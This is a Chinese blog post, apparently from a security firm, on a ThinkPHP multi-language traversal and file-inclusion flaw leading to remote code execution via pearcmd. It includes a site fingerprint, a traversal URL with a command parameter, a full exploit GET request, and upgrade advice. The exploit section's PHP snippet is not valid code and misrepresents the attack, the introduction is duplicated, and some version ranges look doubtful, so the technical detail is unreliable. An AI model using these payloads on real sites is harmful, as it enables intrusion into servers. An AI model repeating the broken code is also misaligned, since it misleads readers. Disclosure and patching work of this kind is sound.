Thinkphp-v6漏洞如何修复

简介: ThinkPHP可以说是快捷、简易的面向对象编程的一个微服务架构,PHP前端框架开发,创建于2006年,遵照Apache2的开源协议进行对外开放,目的是为了快速WEB应用程序开发和优化企业应用软件开发而发展起来的。假如Thinkphp代码开启了多语言这个功能,hack就能通过POST、GET、COOKIES等方式将恶意参数插入进去发送到服务器中进行执行恶意代码,并目录穿越+文件包含,利用pearcmd文件含有这个trick就可以实现RCE远程代码执行漏洞。

Thinkphp漏洞复现

ThinkPHP可以说是快捷、简易的面向对象编程的一个微服务架构,PHP前端框架开发,创建于2006年,遵照Apache2的开源协议进行对外开放,目的是为了快速WEB应用程序开发和优化企业应用软件开发而发展起来的。假如Thinkphp代码开启了多语言这个功能,hack就能通过POST、GET、COOKIES等方式将恶意参数插入进去发送到服务器中进行执行恶意代码,并目录穿越+文件包含,利用pearcmd文件含有这个trick就可以实现RCE远程代码执行漏洞。

使用thinkphp并开启多语言的网站漏洞指纹如下:

header="think_lang"

漏洞影响版本范围

v6.0.0<=ThinkPHP<=v6.0.13

v5.0.0<=ThinkPHP<=5.0.12

v5.1.0<=ThinkPHP<=5.1.8

漏洞利用详情

#exp

pearcmd文件含有方法

$cmd=$_GET['cmd'];

$p=pearcmd;

$p->run($cmd);

目录穿越

//192.168.0.188:9999/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=DIR

能通过POST、cookies、GET等传参的方式,进行目录穿越和文件包含漏洞的利用,对thinkphp下的pearcmd文件进行远程代码命令执行,

HACK可以利用构造恶意的的URL,可以实现目录穿越和文件包含,然后利用pearcmd文件含有对其服务器进行远程命令执行。

这个漏洞利用的前提,必须要thinkphp开启多语言这一功能,像一些外贸公司网站,一些企业网站,想使用多语言的网站都是可以利用该漏洞进行远程代码执行漏洞的。

具体的GET漏洞利用数据包如下:

GET/index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=DIR

Host:192.168.0.188:9999

User-Agent:Mozilla/5.0(WindowsNT10.0;Win32;x32;rv:79.0)Gecko/20100302Firefox/79.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.6,en-US;q=0.4,en;q=0.1

Accept-Encoding:gzip,deflate

Connection:close

Upgrade-Insecure-Requests:1

Cache-Control:max-age=0

如何对该thinkphp漏洞进行修复?

我们SINE安全建议广大站长以及网站运营者,尽快的升级thinkphp到最高版本,目前Thinkphp官方在最新版本中修复了这个漏洞,也可以对该pearcmd文件进行强制删除,待代码漏洞修复后,还原该pearcmd文件,也可以找专业的网站安全公司进行代码漏洞修复和整体的网站安全加固。

相关文章
|
8月前
|
安全 Linux PHP
#Thinkphp5.x漏洞
#Thinkphp5.x漏洞
49 0
|
开发框架 安全 PHP
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
883 0
|
开发框架 安全 PHP
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
544 0
|
安全 调度 PHP
Thinkphp5.0.*之RCE漏洞分析
Thinkphp5.0.*之RCE漏洞分析
|
安全 网络协议 Unix
Thinkphp5 RCE 检测工具
Thinkphp5 RCE 检测工具
Thinkphp5 RCE 检测工具
|
缓存 开发框架 安全
15 ThinkPhp漏洞介绍及利用
Thinkphp介绍 Thinkphp是一种开源框架。是一个由国人开发的支持windows/Unix/Linux等服务器环境的轻量级PHP开发框架。很多cms就是基于thinkphp二次开发的,所thinkphp出问题的话,会影响很多基于thinkphp开发的网站。
15 ThinkPhp漏洞介绍及利用
|
安全 小程序 程序员
网站漏洞测试BUG寻找服务
很多网友以及站长朋友们对漏洞挖掘这个词很陌生,在讲漏洞挖掘之前,就是大家应该对漏洞挖掘可能不是很熟,这里就是其实顾名思义就是从这个名字来说,大家都可以知道什么叫漏洞挖掘,就是在网站上面大家应该有经常听过一些笑话,程序员去这种相亲网站相亲,然后我问他你今天找到了对象吗?程序员说没有,然后他说我今天找到了几个bug,像这种类似的bug或者是有危害性的,我们就叫漏洞,程序员在网站上寻找BUG的过程就是漏洞挖掘,这样比较通俗理解。
189 0
网站漏洞测试BUG寻找服务
|
SQL 安全 测试技术
Thinkphp网站漏洞怎么修复解决
THINKPHP漏洞修复,官方于近日,对现有的thinkphp5.0到5.1所有版本进行了升级,以及补丁更新,这次更新主要是进行了一些漏洞修复,最严重的就是之前存在的SQL注入漏洞,以及远程代码执行查询系统的漏洞都进行了修复,官方本以为没有问题了,但是在实际的安全检测当中发现,还是存在问题,还是可以远程代码进行注入,插入非法字符,提交到服务器后端中去。
395 0
Thinkphp网站漏洞怎么修复解决
|
安全 PHP 数据安全/隐私保护
thinkphp网站有漏洞怎么解决修复
2019年1月14日消息,thinkphp又被爆出致命漏洞,可以直接远程代码执行,getshell提权写入网站木马到网站根目录,甚至直接提权到服务器,该漏洞影响版本ThinkPHP 5.0、ThinkPHP 5.0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23、thinkphp 5.0.22版本。
596 0
thinkphp网站有漏洞怎么解决修复
|
SQL 安全 Linux
discuz网站漏洞修复X3.2 X3.4版本 SQL注入修复网站漏洞
2018年12月9日,国内某安全组织,对discuz X3.2 X3.4版本的漏洞进行了公开,这次漏洞影响范围较大,具体漏洞是discuz 的用户前段SQL注入与请求伪造漏洞,也俗称SSRF漏洞,漏洞产生的原因首先:php环境的版本大约PHP5.2,dizcuzX3.2 X3.4版本,服务器环境是windows 2008 2003 2012系统,linux centos不受此漏洞的影响。
529 0
discuz网站漏洞修复X3.2 X3.4版本 SQL注入修复网站漏洞